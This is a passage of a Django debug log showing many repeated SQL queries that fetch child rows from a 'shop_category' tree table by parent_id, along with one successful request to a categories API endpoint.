"shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:43:09,643 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:43:09,648 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:43:09,652 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:43:09,656 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:43:09,660 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:43:09,664 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:43:09,670 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:43:09,674 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:43:09,678 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:43:09,682 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:43:09,686 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:43:09,692 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:43:09,697 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:43:09,701 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:43:09,705 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:43:09,709 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:43:09,714 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:43:09,718 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:43:09,722 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:43:09,726 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:43:09,731 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:43:09,735 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:43:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:43:56,953 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:43:56,965 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:43:56,969 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:43:56,971 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:43:56,975 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:43:56,977 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:43:56,980 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:43:56,983 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:43:56,988 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:43:56,995 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:43:57,000 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:43:57,003 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:43:57,007 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:43:57,011 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:43:57,016 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:43:57,020 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:43:57,022 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:43:57,025 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:43:57,027 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:43:57,031 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:43:57,034 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:43:57,036 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:43:57,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:43:57,041 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:43:57,044 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:43:57,048 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:43:57,052 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:43:57,056 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:43:57,060 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:43:57,064 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:43:57,069 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:43:57,073 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:43:57,078 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:43:57,082 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:43:57,086 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:43:57,094 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:43:57,098 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:43:57,102 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:43:57,107 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:43:57,111 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:43:57,115 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:43:57,121 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:43:57,125 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:43:57,129 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:43:57,134 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:43:57,139 utils 4252 140031503103744 (0.001) SELECT 